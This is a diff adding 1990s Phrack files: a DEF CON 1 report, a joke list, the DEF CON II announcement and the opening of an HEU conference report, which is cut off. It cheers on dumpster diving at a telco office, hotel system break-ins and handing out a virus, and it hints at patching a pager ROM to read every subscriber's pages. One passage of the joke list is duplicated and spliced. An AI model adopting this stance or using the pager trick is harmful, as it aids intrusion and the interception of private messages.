+a bbs and you get raided, wow will they get the evidence?"  Gail's response
+was basically if they have enough evidence to boot in your door they should
+have enough evidence to prosecute a case.  Want to be a test case for
+encryption?  Neither did he.
+
+    Kurt Karnow, the VR speaker from San Francisco showed up and was talking
+with the New Media Reporter.  Some local radio d.j. who does a late night
+cutting edge style showed up to grab some audio clips from me and bailed out.
+A "suit" showed up, and everyone immediately, in an attempt to win the free
+"I spotted the fed" shirt pointed him out to me.  This "suit" had cop eyes,
+cop walk and cop speak.  He was all businesslike, and wanted to talk to me
+in private.  I took him into the "cone-o-silence" room (the hallway connected
+to the travel agent's place) and asked what's up.  Turns out he is a writer
+for Loompanics and was there checking to see if there was anything or anyone
+worth writing about or having write for him.  Everyone was sure I was a super
+narc after coming out of the cone, but he started loosening up and was talking
+with everyone by the next day.  If he was a fed, they have great feds out there
+that are almost undetectable.  He said his cop speak is a great way to get
+people to tell him stuff they wouldn't normally say.
+
+    Dan Farmer showed up with a female harem in tow.  He seemed to have this
+ability to magically attract females, but we won't get into that here.  He
+would make an appearance and then leave every once in a while.  His women
+looked bored (there were three of them) so I assume he was keeping them
+entertained by gambling or something...
+
+    Dark Druid showed up with Richard Finch, an author who is writing a book
+entitled "The underground road map through cyberspace"  Oh, yeah.  This guy
+still owes me a copy of the video tapes from the convention.  Basically a
+snake.  Said he would send me a copy of them, and then moved and changed his
+number.  We located him and he said he would send them again.  Not.  L00zer.
+Dark Druid was cool, though, and was franticly looking for alcohol to comfort
+him after the long drive.
+
+    One person I met worked for Logicon, SOF Weapon Systems, doing "Nuclear
+event testing."  Basically his job is to see if he can break in and cause a
+simulated "event" (missile launch, detonation, etc.) to happen.  I'll invite this
+guy to speak at DEF CON ][ for sure.  Not that people are going to hack silos,
+but it was very interesting to say the least.
+
+    It was decided it was time for a "Death Star" raid (we had spotted the
+local AT&T office with a billion repeaters and microwave shit on the roof)
+and rounded up a crew to go attack it.  Of course Red Five was standing by
+(Ow!) and Gillian offered to rent a limo to go trashing in.  It turned out
+that it would take 1/2 hour to get the limo, so we went in two cars instead.
+After getting lost in the Las Vegas Hell we found the target.  Fences
+everywhere, a guard patrolling, and an unprotected dumpster just by the
+fences.  Red Five radioed to his friend, we coordinated an attack plan.  I
+laid down flat in the back of the truck, another car was "blocker" on the
+street.  We turned in, screeched up to the treasure chest, I bailed out and
+hurled the bags into the truck and pounced on top of them to the papers
+wouldn't fly out as we hauled ass outta there.  Those Vegas telco employees
+eat more dino-sized McMeals and burgers than I can count.  My body was almost
+covered in apple pie containers and happy meals, yuck.  We hauled the find up
+to the room, and the people who were still up dived on it.  Jamin the Shamin
+went bonkers rooting through crap, and I think White Ninja was sportin' wood.
+People got some interesting items (catalogues, some x.25 phone numbers, etc..)
+while I got to clean up the mess, er, wreckage in the room.  Everyone pitched
+in and by two thirty a.m. it was time to snooze.  Everyone took off to wherever
+they were going, and a few people stuck around to crash in the conference room.
+
+    It seems over the night that the late shift of security personnel were not
+informed that I had the conference room 24 hours.  They showed up at around
+four a.m. and saw Code Ripper, The Prophet and Merc crashed out and they went
+nuts.  At first they asked them to leave to room.  The Prophet explained that
+the room was rented 24 hours, and they didn't care.  He then asked to talk to
+the assistant manager.  They didn't like this and called in the goons.  Like
+five or more guards showed up.  In Las Vegas the goons carry guns.  These guys
+asked to have 'em leave and Code Ripper and Merc were like "Sure, no prob.
+Later!"  The Prophet continued to bitch and got a personal interview with head
+guard man and then a personal boot off the hotel's property.
+
+    Saturday morning I get a fax that Allen Grogan (Editor of the Computer
+Lawyer) won't be able to make it because of a family emergency.  That's one less
+speaker.  Already Count Zero's dad went ballistic when he found out his son
+might speak at the con.  He threatened to sue me if he showed up.  Dude, chill,
+it's your son, not mine.  It turns out he called the Sands Hotel ranting and
+raving at anyone he could.  Moreen said, "he was spouting off things about law
+suits and some such, so I transferred him to legal."  What a kook.  Midnight
+Sorrow (used to run CCi) backed out too after his phone bills reached like
+half of the national debt.  ErikB spent too much money at SCon and he bailed
+out also.  They were dropping like flies!  Scott Simpson wasn't about to show
+up after his door was kicked in with the help of various federal agencies,
+either.  Oh well, we still had a full speaking list.
+
+    Robert X. Cringly from Info World was there, a photographer from Mac World,
+John Littman, Unix World (<- an evil review.. don't believe it.. it was all
+wrong and jumbled.  Rik Farrow messed it up) another photographer who took the
+picture that ended up in New Media was there.  The photographer (Who turned
+out to be Karnow's sister) gathered some "cyberpunk" looking people together
+for it.. needless to say I wasn't in it.  She bought a bunch of alcohol for
+everyone, so that wasn't so bad.
+
+    I did a little blurb welcoming everyone and talking about my run in at the
+Seattle 2600 meeting a few weeks before, and then let Ray K. start off the
+convention.  About halfway through the talks before lunch, the X. Cringe factor
+got a cellular phone call, and got up to leave the room so as not to disturb
+the audience.  He was about halfway towards the door when you could hear
+scanners turning on all over the room (well, OK, three of them) and a
+coordinated effort was put forth to find his call.  Some start at the low
+frequencies and worked up, and some at the high frequencies and worked down.
+It turns out it was only Pammy, and no super secret industry gossip.  Bummer.
+
+  I'm not going to cover exactly what the speakers had to say because I wouldn't
+know what to include and what not too.  Get the tapes, or ftp the huge
+digitized speeches off the ftp site (cyberspace.com /pub/defcon) and listen
+to 'em.  We tried to make typed transcripts, but they were a nightmare, so we
+gave up on it.  This is basically what was covered:
+
+     Ray Kaplan did a verbal sample of the attendees, and then went on to talk
+about morality and the hacking ethic.  He came across pro-responsible-hacker,
+but managed to get into a debate with Torquamada who though he was preaching
+too much.  A good exchange, and his talk reminded me of some of the stuff you
+hear on IRC late at night when #hack becomes #hack-politics, only better.
+
+     Gail Thackery spoke about where the law is coming from in all this, and
+was very straight forward with a no shit attitude.  She said she loved
+capturing and collecting all the log in screens of bbs systems that have lame
+disclaimers like "If you are a fed you can't log on here.  If you press 'y'
+you can never narc on me."  She swaps 'em with her other law enforcement
+friends.  As a side note we were selling hack pads and bbs pads that attempted
+to organize all the notes people make in the course of things.  It seems every
+one who gets nabbed gets nabbed with their "bust-me book"  You know, that
+note pad with all the incriminating evidence on it that everyone keeps.  Well
+we figured we'd at least make things easier so we had these pads.  Gail looked
+them over and made a comment like, "Oh, those look just like ours except we
+have a space for the case number in the upper right hand corner."
+
+     Judy Clark from the CPSR spoke about the role of the CPSR (Computer
+Professionals for Social Responsibility) as opposed to that of the EFF which
+is almost entirely, well, er, it is, sponsored by large corporations including
+computer and telephone interests.  She spoke about privacy issues and what to
+do if you are interested in getting involved.
+
+     There was a panel discussion with Gail and Ray K fielding questions from
+the audience.  Ray talked about how security is useless unless the employers
+and employees are willing to change their way of working.  It's not as simple
+as installing the latest and greatest security packages.
+
+     Kurt Karnow works as an attorney for a San Fransisco law firm that
+represents large companies such as AT&T and Sega.  He spoke about "ZUI" or
+Zero User Interface as envisioned in the future with VR equipment.  He talked
+about how impossible it is to  debug any large program 100%, and that mistakes
+and problems will occur.  He talked of a recent case he worked on, where the
+makers of "Sim City" made "Sim Oil Refinery" for a large oil company.  The
+company was concerned that if their software was programmed incorrectly, and
+they find that out by having a refinery explode when the employees did
+something they were trained to do, that they could loose all.  Kurt was also
+great is shamelessly hoping some for a few good accidents so he could finance
+his kids through college.  A very well informed and easy to talk to person.
+
+     Dr. Mark Ludwig Spoke about the philosophy behind his virii programming
+analysis.  It was almost a political talk about the invasive government
+policies and the desire of the Federal System to be the know all and be all
+in the future.  He spoke about their attempts to restrict encryption
+technologies.  He announced that he has come up with a virus that acts as a
+software delivery service for the IDEA encryption algorithm.  When you
+insert this disk, or get the "infection" it asks if you want to encrypt your
+fixed disk, and then asks for your password.  Any floppy that is inserted on
+your system gets encrypted and infected with the password of your choice.
+You can toggle the encryption on and off, un-install your hard drive, etc.  He
+posed the question to the crowd, "What if everyone woke up one day and all
+their data was safely encrypted?  If encryption became the standard, people
+would have less to fear from Big Brother."  I've got the virus, called the
+KOH virus, currently being updated, and will bring it to Pump Con ][, Ho Ho,
+Etc. for anyone interested.
+
+     Dead Addict spoke on the past and the future as he sees it of the Computer
+Underground's various factions.  The increase of people on the net and the use
+of more and more networks will yield rich lands to be explored.  It turned
+into a question and answer with people discussing their view on where things
+are going.
+
+     Dan Farmer spoke on Unix security.  He was very good and sounded very well
+informed.  He has learned his tricks monitoring the 30,000 or so workstations
+used by Sun Microsystem and else where over the years.  He talked about how
+people get caught and what to do about it.  How sysadmins usually monitor and
+maintain their systems.  Basically he was bored with password crackers and lame
+passwords.  He focused on the creative ways to get root.  "If you can gain
+access enough to execute one command on the victim computer, you should be able
+to get root."  He avoided bugs and problems that will be fixed, and focused on
+flaws in the way systems and networks are set up.
+
+     Dark Druid talked about his bust and how it sucks not to be charged and
+still not have his equipment back after it was seized.
+
+    Right as the group was breaking up someone did a quick impromptu
+demonstration to a few people of a laptop plugged into the diagnostic port of a
+cell phone that allowed all types of crazy activity.  People broke into groups
+and went out for dinner.  I ended up with Gail Thackery, Gillian the reporter,
+Kurt Karnow, the sysadmin of cyberspace and a few others.  General B.S. about
+government plots and assassinations ensued with real discussions branching off.
+Because there are no clocks anywhere in Las Vegas we kinda lost track of time,
+and wandered back to the hotel in an hour or so.  People changed and the broke
+off to do their thing.
+
+    I ran into a guy from SGI security at the bar, and then Dan Farmer, and
+then Aleph One, and then fuck, it seemed like a mini con at the bar.
+People were drinking like fiends, and Gail showed up with Gillian and the crowd
+from L.A. and the San Francisco 2600 group was there drinking too.  Gail was
+chain smoking and pounding Johnny Walker straight, drinking most of us under the
+table.  I think that shocked more people more than anything else!  We finally
+got a thinly clad waitress to take a group picture, where everyone is all
+smiles and laughing, and Gail has this evil frown looking like this is the last
+place on earth she wants to be.  Right as the pic is taken someone goes to fake
+pour a drink on her head, making for a great picture WHICH I STILL DON'T HAVE!
+(Aleph One, send me that digitized picture so I can stick it on the ftp site)
+
+    Sunday people just hung out to bull-shit about whatever, with groups
+forming on and off till everyone took off for home.  Someone approached me
+and let me know that they had the password for the Sands Hotel Vax
+system and the barrier code for their PBX.  "If the hotel gave you too much
+trouble, just let me know."  You would think that after years of mob and
+crime action the casino would have a functional security set up.  Not.  That
+was area code 702 for anyone interested in scanning it.
+
+    A few of use were sitting around waiting for time to pass when I found a
+bunch of wires wrapped together from the death star raid Friday night.  It sort
+of looked like a mini whip, and was immediately termed the "Def Con Cyber-Whip"
+Needless to say, we had to present the Cyber-Whip to Dan Farmer for his
+excellent contribution mention of a.s.b. during his speech that seemed to
+cause the most gossip.  Hacking a network? No problem.  Talking about a.s.b.?
+OuTrAgEoUs!  People are so funny.  Anyway, Dan is now the keeper of the
+Cyber-Whip.  We'll try to come up with a more formal presentation next year.
+That should drive the media nuts.  Hey, with a little help from ErikB for video
+entertainment maybe create a Def Con dungeon. Ha! Ok, it's late.  Hackers are
+such sick people.
+
+    A lot of people made great contacts and I'm still hearing of people who
+are working with their new contacts doing "things"  I managed to weasel a
+job out of the deal, writing a small monthly column in New Media Magazine
+(as my editor puts it) on "Interesting things that could only happen on the
+net."  This gets translated to reading a bunch of newsgroups in a futile
+attempt to find something that would be amusing to the readership.  If you
+guys have any good rumors you want mentioned, just feed 'em to me in e-mail.
+
+    Overall a good time.  We planned for about 100 people max, and we got just
+around 110 or so.  Our blurb in 2600 came out late, Mondo 2000 missed an issue
+and Wired messed up hard core twice.  I had mailed LR inviting someone to
+attend and asking if we could get a mention in the upcoming events section. He
+said sure, just e-mail me.  I did that and nothing happened.  I talked to him,
+and he said I should send it to someone else at Wired, which I did.  It wasn't
+in the next issue either!  Right before the con I got e-mail form someone at
+Wired asking me if the convention was still on and what its status was.  They
+are nice people there, just a little bit confused or busy.  This was happening
+right after wired.com got hacked so they might have been preoccupied.  This
+year we won't miss any deadlines and make sure that the word gets spread well
+in advance so we can get a greater turn out, but for a first attempt it went
+over well.  No fights, fire alarms pulled or people vomiting on the gamblers.
+The things that could be improved like more technical speeches, etc., will all
+be fixed in DEF CON ][.  We'll have midnight tech talks, terminals hooked up
+to the net for people to IRC on or whatever, and additional speeches on Sunday
+so people have an excuse to stick around that day.
+
+    [Generic closing statement omitted]
+
+    The Dark Tangent
+    dtangent@defcon.org
+
+*******************************************************************************
+
+                    Top 23(!) things learned at DEF CON 1
+                             By The White Ninja
+
+                        "Jesus Hacks! Why don't YOU?"
+
+                 This text file idea blatantly leeched from:
+                                 SummerCon!
+
+1.  Casino offices can be full of fun!!
+
+2.  Casinos generally don't appreciate it when you explore their offices....
+
+3.  Yes, some people ARE capable of gambling away $167 in an hour!
+
+4.  You can get reasonable conference discounts on prostitution in Nevada.
+
+5.  One can survive for 3 days in Vegas on $12 and a gift certificate.
+
+6.  Viruses are our friends.
+
+7.  Give a Casino security guard a walkie-talkie and he'll swear he's the
+    center of the universe.
+
+8.  Don't commit a felony in front of Gail Thackery.
+
+9.  The people who work at the Death Star throw the darndest things in the
+    trash!
+
+10. Pirates and Theives ONLY!
+
+11. If you harass a hotel telephone operator long enough she WILL send
+    security.
+
+12. When using ITT ask for BOB...
+
+13. Metal plates screwed to your hotel room ceiling generally constitute a
+    bad sign.
+
+14. Don't forget to Hack the BED!
+
+15. You know your in deep shit when THEY aim an IR-Mic at your window.
+
+16. Setting 11 fires in selected parts of the city is probably a bad idea.
+
+17. The guy who looks most like a fed probably writes for LOOMPANICS.
+
+18. The guy who looks least like a fed probably does security for SUN.
+
+19. As a general rule, don't hack the hotel PBX unless you're giving them a
+    better credit rating.
+
+20. If your wondering where all those C-64 warez kidz went, try talking to
+    some of the beggars in Vegas.
+
+21. Those COCOTS were gold plated for a REASON!
+
+22. If you plan to stay the night in a hotel, make sure you get a room there.
+
+23. "0K, dit rating.
+
+20. If your wondering where all those C-64 warez kidz went, try talking to
+    some of the beggars in Vegas.
+
+21. Those COCOTS were gold plated for a REASON!
+
+22. If you plan to stay the night in a hotel, make sure you get a room there.
+
+23. "0K, this is my new PGP key for use in sensitive matters. Heck, use
+    it for unsensitive matters.. people sniff packets 'ya know."
+
+*******************************************************************************
+
+What Was Your Best Hack                                         September, 1993
+~~~~~~~~~~~~~~~~~~~~~~~
+(New Media) (Page 14)
+
+[Asked at Def Con 1, the first formal gathering of the hacker community
+ to discuss security, viruses and the law.]
+
+Mike Winters, 19, Seattle
+   Claims to have hacked into GMAC and then held a conference call with
+   GM's VP of Finance to help him "secure the system."
+
+HB, San Mateo, California
+   Broke into a system to counterfeit checks to "show his employers
+   how easy it was."  Got arrested with two years probation and
+   24 days of community service.
+
+Gail Thackeray, 44, Deputy County Attorney, Phoenix
+   A Hacker had broken into a voice mail system and was using it
+   as a code line.  The company could not take down the system
+   until the prosecutors were ready to make a case.  When they did,
+   the company blocked all access and changed the greeting to
+   a song parody of "Hey Jude" called "Hey Dood," which really
+   infuriated the hacker.
+
+*******************************************************************************
+
+Dead Addict At Def Con                                          September, 1993
+~~~~~~~~~~~~~~~~~~~~~~
+by Gillian Newson (New Media) (Page 119)
+
+["The oldest cyberchick" hangs with the Def Con Posse and discovers
+ the joys of trashing.]
+
+*******************************************************************************
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+
+]]]]]]]]]]]]]]]]]] ]]] ]] ]  ]]   DEF CON ][ Initial Announcement
+]]]]]]]^^^^]]]]]]]]]]]]] ]]  ] ]  DEF CON ][ Initial Announcement
+]]]]]]^^^^^^]]]]] ]   ]     ]     DEF CON ][ Initial Announcement
+]]]]]^^^^^^^^]]]]] ]]   ]         DEF CON ][ Initial Announcement
+]]]]^^^^^^^^^^]]] ]  ]]]]]]]] ]   DEF CON ][ Initial Announcement
+]]]^^^^^^^^^^^^]]]]]]]]]]  ]      DEF CON ][ Initial Announcement
+]]^^^^^^^^^^^^^^]]]]]]   ]]   ]   DEF CON ][ Initial Announcement
+]]]^^^^^^^^^^^^]]]]]]]]           DEF CON ][ Initial Announcement
+]]]]^^^^^^^^^^]]]]]]]]  ]  ]]     DEF CON ][ Initial Announcement
+]]]]]^^^^^^^^]]]]]]] ]]]   ]]  ]  DEF CON ][ Initial Announcement
+]]]]]]^^^^^^]]]]]]] ] ]  ]        DEF CON ][ Initial Announcement
+]]]]]]]^^^^]]]]]]]]]]] ]] ] ]     DEF CON ][ Initial Announcement
+]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ]  DEF CON ][ Initial Announcement
+
+READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
+
+WTF is this?  This is the initial announcement and invitation to DEF CON ][,
+a convention for the "underground" elements of the computer culture.  We try
+to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
+Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties
+Groups, CypherPunks, Futurists, etc..
+
+WHO:   You know who you are, you shady characters.
+WHAT:  A convention for you to meet, party, and listen to some speeches that
+       you would normally never hear.
+WHEN:  July 22, 23, 24 - 1994
+WHERE: Las Vegas, Nevada @ The Sahara Hotel
+
+So you heard about DEF CON I, and want to hit part ][?  You heard about the
+parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
+check it out in person?  Load up your laptop muffy, we're heading to Vegas!
+
+
+Here is what Three out of Three people said about last years convention:
+
+"DEF CON I, last week in Las Vegas, was both the strangest and the best
+computer event I have attended in years." -- Robert X. Cringely, Info World
+
+"Toto, I don't think we're at COMDEX anymore." -- Coderipper, Gray Areas
+
+"Soon we were at the hotel going through the spoils: fax sheets, catalogs,
+bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds.
+The documents disappeared in seconds."  -- Gillian Newson, New Media Magazine
+
+DESCRIPTION:
+
+Last year we held DEF CON I, which went over great, and this year we are
+planning on being bigger and better.  We have expanded the number of speakers
+to included midnight tech talks and additional speaking on Sunday.  We attempt
+to bring the underground into contact with "legitimate" speakers.  Sure it's
+great to meet and party with fellow hackers, but besides that we try to
+provide information and speakers in a forum that can't be found at other
+conferences.
+
+WHAT'S NEW THIS YEAR:
+
+This year will be much larger and more organized than last year.  We have a
+much larger meeting area, and have better name recognition.  Because of this
+we will have more speakers on broader topics, we plan on having a slip
+connection with multiple terminals and an IRC connection provided by
+cyberspace.com.  We are trying to arrange a VR demo of some sort.  Dr. Ludwig
+will present this years virus creation award.  There will be door prizes, and
+as usual a bigger and better "Spot The Fed" contest.  If you are elite enough
+to handle it, there should be the returning of the Cyber-Whip and the
+beginning of a new one.  We'll try to get an interesting video or two for
+people to watch.  If you have any cool footage you want shown, email me with
+more information.
+
+
+WHO IS SPEAKING:
+
+We are still lining up speakers, but we have several people who have expressed
+interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer
+Viruses), Phillip Zimmerman (PGP), The Mentor (Steve Jackson Games),
+Ken Phillips (Meta Information), and Jackal (Radio) to name a few, plus there
+should be a mystery speaker via video conference.  We are still contacting
+various groups and individuals, and don't want to say anything until we are as
+sure as we can be.  If you think you are interested in speaking on a self
+selected topic, please contact me.  As the speaking list is completed there
+will be another announcement letting people know who is expected to talk, and
+on what topic.
+
+
+WHERE THIS THING IS:
+
+It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
+anywhere in an attempt to lull you into believing the day never ends.  Talk
+about virtual reality, this place fits the bill with no clunky hardware.  If
+you have a buzz you may never know the difference.  It will be at the Sahara
+Hotel.  Intel as follows:
+
+        The Sahara Hotel 1.800.634.6078
+        Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax
+        Transportation: Shuttles from the airport for cheap
+
+   NOTES:  Please make it clear you are registering for the DEF CON ][
+   convention to get the room rates.  Our convention space price is
+   based on how many people register.  Register under a false name if
+   it makes you feel better, 'cuz the more that register the better for
+   my pocket book.  No one under 21 can rent a room by themselves, so
+   get your buddy who is 21 to rent for you and crash out.  Don't let
+   the hotel people get their hands on your baggage, or there is a
+   mandatory $3 group baggage fee.  Vegas has killer unions.
+
+
+COST:
+
+Cost is whatever you pay for a hotel room split however many ways, plus
+$15 if you preregister, or $30 at the door.  This gets you a nifty 24 bit
+color name tag (We're gonna make it niftier this year) and your foot in the
+door.  There are fast food places all over, and there is alcohol all over
+the place, the trick is to get it during a happy hour for maximum cheapness.
+
+
+FOR MORE INFORMATION:
+
+For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in
+/pub/defcon.  There are digitized pictures, digitized speeches and text files
+with the latest up to date info available.
+
+For email users, you can email dtangent@defcon.org for more information.
+
+For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207
+
+For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone.
+
+A DEF CON Mailing list is maintained, and the latest announcements are mailed
+automatically to you.  If you wish to be added to the list just send
+email to dtangent@defcon.org.  We also maintain a chat mailing list where
+people can talk to one another and plan rides, talk, whatever.  If you request
+to be on this list your email address will be shown to everyone, just so you
+are aware.
+
+
+STUFF TO SPEND YOUR MONEY ON:
+
+> Tapes of last years speakers (four 90 minute tapes) are available for $20
+
+> DEF CON I tee-shirts (white, large only) with large color logo on the front,
+  and on the back the Fourth Amendment, past and present.  This is shirt v 1.1
+  with no type-o's.  These are $20, and sweatshirts are $25.
+
+> Pre-Register for next year in advance for $15 and save half.
+
+> Make all checks/money orders/etc. out to DEF CON, and mail to the address
+  above.
+
+If you have any confidential info to send, use this PGP key to encrypt:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+
+mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
+dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
+uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
+hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
+IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
+=ko7s
+-----END PGP PUBLIC KEY BLOCK-----
\ No newline at end of file
diff --git a/phrack44/8.txt b/phrack44/8.txt
new file mode 100644
index 0000000..ba0ef27
--- /dev/null
+++ b/phrack44/8.txt
@@ -0,0 +1,1019 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 8 of 27
+
+                                Conference News
+
+                                   Part III
+
+****************************************************************************
+
+A Hacker At The End Of The Universe
+
+by Erik Bloodaxe
+
+Eight hours on a plane isn't that bad.  It isn't that fucking great
+either, but it isn't the end of the world.  This is especially true
+under certain circumstances like if you were being inducted into the
+mile-high club by means of an obscure tantric ceremony, or you've just
+successfully hijacked a 747, or you are nestled in your seat on your way
+to Amsterdam.
+
+Unfortunately, I haven't hijacked much lately, and as far as the mile
+high club goes I'm pretty sure you need a partner to join; but as I was on
+my way to Hacktic's Hacking at the End of the Universe conference, I was
+stoked.
+
+When I finally arrived in Amsterdam and breezed through customs, I was
+greeted with the pleasant sight of a LOD Internet World Tour T-Shirt
+being held up above the throngs congregating at the customs exit.  Its
+owner, Carl, was probably the only American that I knew that was going
+to be in this country so we had arranged previously to meet.  The shirt
+was my beacon.
+
+EB's Handy Travelling Tip #1:  Never have more bags than you have hands.
+
+I was to find out that we were in for a good deal of walking.  Me being
+such a fucking plan ahead kind of guy, had packed enough clothes for 8 days
+and brought a camcorder as well as my laptop and assorted other crap.  This
+was all find and dandy except for the fact that I had three bags and only two
+hands.  I hoisted one bag up on a shoulder strap (which would begin its
+week-long gradual slicing into my collarbone) and drug the other two bags
+behind me.
+
+Carl had rented a room in Naarden at a Best Western or something.  The con
+was in Lelystad somewhere.  Neither of us had any idea of exactly where
+these two places were in relation to one another.  We would soon find
+that they were no where close.
+
+EB's Handy Travelling Trip #2:  Buy a Eurail Pass or the national equivalent
+                                thereof.
+
+Luckily, Carl had the foresight to suggest that we should buy a train
+pass for the week.  It was only like 50 bucks and got us free rides
+on the trains, trams, buses, and train-taxis everywhere in the Netherlands.
+It MORE than paid for itself.
+
+We hopped a train and rode to the Amere stop, then took a taxi to
+the hotel, dropped off our crap then rode a bus back to the station
+and went into Amsterdam.
+
+Amsterdam is a really neat place.  I think everyone should go there
+at least once.  Carl and I wandered around for hours and hours
+just checking things out.  During our travels I discovered some really
+neat places.
+
+EB's Handy Travelling Tip #3:  Pornography Is Good.
+                               Foreign Pornography is GREAT!
+
+I have to respect a country that has smut proudly displayed everywhere.
+In every magazine rack, in every train station, convenience store and
+in large (clean, well-lit, heh) stores everywhere, smut.  Not your average
+run of the mill nastiness either.  We're talking monumental titles
+like "Teenage Sperm," "Seventeen," "Teeners From Holland," "Sex Bizarre,"
+and "Color Climax."
+
+I went in every smut shop we saw.  I think Carl wanted to die of embarrassment.
+I was like a kid in a candy store.  It was really pathetic.  You would not
+believe the shit they sell over there.  Well, maybe you would.  I pray
+that I can buy a vcr that transfers PAL to NTSC someday.
+
+One of the most hilarious items I saw was a HUGE dildo in the shape of an
+arm with a fist.  And I mean life size.  Like Arnold Schwartzenegger's
+arm life size.  I wonder if that's a big seller?
+
+We finally got totally zonked out and headed back to the hotel to
+relieve our jetlag tomorrow was the con!
+
+EB's Handy Travelling Tip #4:  Always take the Train Taxi
+
+In Holland, once you get off the train, for an extra 10 guilders, you can
+get a pass for a special taxi to take you anywhere you need to go.  Carl
+and I didn't find this out until a few 20 dollar cab rides to the campground.
+
+HEU was held out in the Dutch countryside.  A more appropriate title might
+have been "Hacking in the Middle of Fucking Nowhere."  The taxi driver
+had been shuttling people out there all day.  As we approached the campground
+signs for the conference began to show up.  Signs of geekdom on the horizon.
+
+We got out at the gate, and walked over to the tent that said registration.
+In the tent were a couple of guys who took your picture and printed out
+a badge with your picture digitized on it.
+
+The area was layed out very well.  There was a very big barn like structure
+where several dozen computers were all networked together.  I sat down
+at one and saw that there was even a slip trying to work.  With that many
+people trying to be on the net, it was almost 20 baud!  Wow, technology
+at its finest.  :)   I also noticed that at least 2 people were running
+ethernet sniffers, so I decided that it would not be prudent to
+mess with the net there, even if the bandwidth dramatically increased.
+
+Also in the barn were a tv/vcr area, several couches, a merchandise
+area and a snack bar.  The snack bar sold rolls for a buck, and had free
+sandwich makings (like pb & j, cheese & meat, etc..) chips, jolt, and
+beer.  This was very important to me since I was wondering if I'd
+get to eat.
+
+There was to be some kind of food provided (a meal) for five bucks, but
+it was so foul that it could not be believed.  And to top it all off
+it was vegetarian.  Not just regular vegetarian, but totally off beat
+stuff that smelled like old socks.  Nasty gruel unfit for even
+prisoners.
+
+Behind the barn was the camping area.  There was a HUGE tent
+that was the main meeting area, and several mid-size tents.
+Additionally there was a large lookout tower, and a shitload of
+tents set up for sleeping.  Running all over the campground were cables
+for the conference's LAN.
+
+It was impressive so say the least.
+
+One of the first people I ran into at the con was KCrow.  He helped me
+try to find a safe place to stow some of my crap.  (Again, me and my
+fucking bags.  I'm such an asshole.)  We tried to place them in
+the network control room, but Bill SF told me to "get the hell out
+of there," so I did.  And this of course, has left me with a wonderful
+opinion about Bill SF.  (Bill, I love ya!)  Several people tried to
+make excuses in his behalf such as "he hadn't slept in days," or
+"Bill isn't ever so rude," and "He's got a lot on his mind."
+Yeah, right.
+
+(And I didn't even say ANYTHING about how shitty it would be to try to
+make millions counterfeiting something, then let one of your friends take
+the fall for you, while you left the country.  Nope.  I would never be so
+rude.  There is a difference between a true hacker and an opportunistic
+technologically literate criminal.  But I didn't say that.)
+
+I finally just stuck my stuff behind the merchandising area and prayed
+that there was still honor among thieves.
+
+I then ran into Damiano.  He told me who was around.  Several CCC people
+had arrived in a convoy of odd urban assault vehicles.  The Germans
+(other than Damiano) kind of made me uneasy.  They seemed to hang
+together and didn't talk to many non-germans.  I suppose maybe some
+of them didn't speak English, or maybe I was just thinking odd
+Nazi fantasies.  I dunno.  Of all the people that were supposedly
+there, I kept missing Pengo.  It was like some kind of weird trick.
+"Did you see him?  He was just here."  I never saw him.
+
+That afternoon I only made it to one "workshop."  I was to find out
+later that all of the really technical workshops had a common thread.
+"Here's this cool technology, now go buy it from Hack-Tic for several
+hundred dollars."
+
+The first example I had of this was in the "It came out of the sky"
+workshop where Bill SF talked about a device they had made that
+received pager information.  They presented a few scenarios in which
+police or other nasties might watch pagers, or always page certain numbers
+right before raids, etc...
+
+The concept was neat, but certainly nothing new.  For a few bucks more
+than they were asking for the Hack-Tic model, you can buy a multimode
+decoder from Universal Radio (model M-400).  It not only does POCSAG but
+also GOLAY (for pagers), ACARS, ASCII, Baudot, SITOR A & B, FEC-A, SWED-ARQ,
+FAX, CTSS, DCS & DTMF!  Now that's a decoder.
+
+Additionally, a company called SWS security makes a similar device for
+law enforcement people at about $4,000 that does nothing but decode
+pager information.
+
+If it came right down to it, all you would have to do is open up your beeper,
+dump the rom, and tell it to display info for ALL cap-codes rather than
+just yours.  Your cap-code is written on the back of your beeper, and is
+stored in non-volatile memory somewhere.  Look for the call to it, and have
+it always branch to the display routine rather than do a comparison.
+
+I asked Bill about re-crystaling the device, since it there's would only be
+able to pick up one pager channel as is, and about whether or not anyone had
+played with any of the 8-bit paging types such as is used in America on
+services such as EMBARC.  Bill looked at me as if I was on crack, and
+asked, "Are there any other questions?"  Sigh.
+
+After that workshop, I took off with Andy of the Chaos Computer Club
+back to the German enclave.  These guys were nuts.  They had several
+winnebagoes totally decked out with all kinds of archaic electronic
+gear.  They had all kinds of odd radio equipment; weird shit
+with Russian lettering was strewn about.  The guys hanging about
+were jamming out really loud hard techno.  I leeched a few programs
+from Andy and then took off back to the main area.
+
+Sometime later, a guy who said he knew me from way back named
+Mr. Miracle came up to say hello.  I had no idea, but since I rarely
+remember my own name, I took him for his word.  Mr. Miracle was at the
+con with his friends Wim and a Tasmanian Amiga Dude named XTC.
+We hung out the rest of the afternoon bullshitting and talking about
+all kinds of stupid things.
+
+As it grew dark, everyone moved into the Barn.  Me, Carl, Mr. Miracle, XTC,
